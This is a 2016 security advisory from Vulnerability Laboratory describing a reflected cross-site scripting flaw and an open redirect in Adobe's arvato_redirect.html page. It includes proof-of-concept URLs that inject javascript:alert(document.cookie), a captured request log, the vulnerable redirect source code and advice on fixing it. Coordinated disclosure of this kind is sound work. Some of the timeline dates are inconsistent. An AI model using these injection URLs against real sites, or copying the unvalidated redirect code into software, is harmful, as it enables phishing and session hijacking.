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Adobe - Multiple Client Side Cross Site Scripting Web Vulnerabilities
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Document Title:
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Adobe - Multiple Client Side Cross Site Scripting Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1628
PSIRT ID: 4260 / 4261
Release Date:
=============
2016-02-15
Vulnerability Laboratory ID (VL-ID):
====================================
1628
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
Whether it is a smartphone or tablet app, a game, a video, a digital magazine,
a website, or an online experience,
chances are that it was touched by Adobe technology. Our tools and services
enable our customers to create
groundbreaking digital content, deploy it across media and devices, and then
continually measure and optimize it
based on user data. By providing complete solutions that combine digital media
creation with data-driven marketing,
we help businesses improve their communications, strengthen their brands, and
ultimately achieve greater business success.
(Copy of the Vendor Homepage: http://www.adobe.com/aboutadobe/)
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
client-side vulnerabilities in the official adobe online-service
web-application.
Vulnerability Disclosure Timeline:
==================================
2015-10-29: Researcher Notification & Coordination (Daniel Díez Tainta -
DaniLabs)
2015-10-30: Vendor Notification (Adobe PSIRT - Security Acknowledgements)
2015-11-03: Vendor Response/Feedback (Adobe PSIRT - Security Acknowledgements)
2015-02-03: Vendor Fix/Patch (Adobe - Developer Team)
2015-02-14: Security Reward (Adobe PSIRT - Security Acknowledgements)
2015-02-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Adobe Systems
Product: Online Service - Web Application 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple client-side web vulnerabilities has been discovered in the official
Adobe (arvato) online service web-application. The first vulnerability
is a Cross Site Scripting of type reflected. The second vulnerability is an
open redirect is an application that takes a parameter and redirects an
user to the parameter value without any validation.
The vulnerability is located in the `tduid` and `url` parameter values of the
arvato_redirect.html file GET method request. The `tduid` parameter
receives as argument `0`. The `url` parameter receives as argument an url or
javascript code. Remote attackers are able to inject script codes
to the client-side browser to application GET method requests. The attack
vector of the issues are client-side and the request method to inject
is GET. An attacker can send an url like http://www.vulnerability-lab.com and
the request redirect to the external target url without approval.
An attacker can also send a javascript code like
`javascript:alert(documen.cookie)` and the request executes without secure
validation.
The security risk of the client-side web vulnerabilities are estimated as
medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the non-persistent web vulnerabilities requires no privileged
web application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking,
non-persistent phishing, non-persistent external redirects,
non-persistent load of malicious script codes or non-persistent web module
context manipulation.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Adobe - arvato
Vulnerable File(s):
[+] arvato_redirect.html
Vulnerable Parameter(s):
[+] tduid
[+] url
Proof of Concept (PoC):
=======================
The client-side vulnerabilities can be exploited by remote attackers without
privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Cross Site Scripting
https://www.adobe.com/arvato_redirect.html?tduid=0&url=javascript:alert(document.domain)
https://www.adobe.com/arvato_redirect.html?tduid=0javascript:alert%28document.cookie%29&url=
PoC: Open Redirect
https://www.adobe.com/arvato_redirect.html?tduid=0&url=http://www.google.es
--- PoC Session Logs [GET] ---
Status: OK[200]
GET
https://www.adobe.com/arvato_redirect.html?tduid=0&url=javascript:alert(document.cookie)
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des
Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[www.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[dtLatC=56; dtPC=198644794_638h1; TRADEDOUBLER=0;
mbox=session#1446198637998-786547#1446200498|PC#1446198637998-786547.26_19#1449222639;
s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2B199EBC05314EB1-6000011420006DAD[CE];
sfdc_session=-;
s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20s_sq%3D%3B%20s_demandbase_v2.2%3Ddone%3B%20s_dmdbase%3D%255Bn%252Fa%255D%253A%255Bn%252Fa%2
55D%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%253AWireless%253AMobile%2520Network%3B%20s_
dmdbase_custom%3DFuldabr%25C3%25BCck%253A05%253A34277%253ADE%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%253A%255Bn%252Fa%255D%3B;
s_pers=%20s_fid%3D014AEA34CF75A081-30D64128250EAD69%7C1509357038901%3B%20s_vs%3D1%7C1446200438903%3B%20gpv%3Dno%2520value%7C1446200438906%3B%20s
_nr%3D1446198638908-New%7C1477734638908%3B; s_cc=true;
aam_uuid=88603075514468463170269453653802973821;
dtCookie=87E42C5B5E16F929E67CA5354B350B54|QWRvYmUrZUNvbW1lcmNlfDE]
PoC: Source (Arvato Affiliate tracking Redirect Page)
function setCookie(name, value, expires, path, domain, secure)
{
console.log("Entering to set Cookie");
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
console.log(expires_date);
document.cookie= name + "=" + escape(value) +
((expires) ? "; expires=" + expires_date.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
console.log(document.cookie);
}
function getVar(name)
{
get_string = document.location.search;
return_value = '';
do
{
name_index = get_string.indexOf(name + '=');
if(name_index != -1)
{
get_string = get_string.substr(name_index + name.length
+ 1, get_string.length - name_index);
end_of_value = get_string.indexOf('&');
if(end_of_value != -1)
{
value = get_string.substr(0, end_of_value);
}
else
{
value = get_string;
}
if(return_value == '' || value == '')
{
return_value += value;
}
else
{
return_value += ', ' + value;
}
}
}
while(name_index != -1)
{
space = return_value.indexOf('+');
}
while(space != -1)
{
return_value = return_value.substr(0, space) + ' ' +
return_value.substr(space + 1, return_value.length);
space = return_value.indexOf('+');
}
return(return_value);
}
function redirTo()
{
var strReturn = "";
var strHref = document.location.href;
if ( strHref.indexOf("&url=") > -1 )
{
strReturn = strHref.substr(strHref.indexOf("&url=")+5);
}
else
{
strReturn = "http://www.adobe.com";
}
return strReturn;
}
var mytduid = getVar('tduid');
console.log("TDUID : "+mytduid);
setCookie('TRADEDOUBLER', mytduid, 365,"/",".adobe.com",true);
window.location = redirTo();
Reference(s):
https://www.adobe.com/arvato_redirect.html
Solution - Fix & Patch:
=======================
The open vulnerability can be patched by a restriction of the requested
parameters in the url value. Disallow special chars and use a whitelist to deny
external redirects.
The client-side cross site scripting vulnerability can be patched by a secure
parse and encode of the vulnerable tduid value in the arvato_redirect.html file.
Disallow special chars and filter the input to correct the context to prevent
further client-side javascript code injection attacks against the
web-application.
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in
the adobe web-application is estimated as medium. (CVSS 3.0)
The security risk of the client-side open redirect web vulnerability in the
adobe web-application is estimated as low. (CVSS 2.1)
Credits & Authors:
==================
Daniel Díez Tainta - (@DaniLabs)
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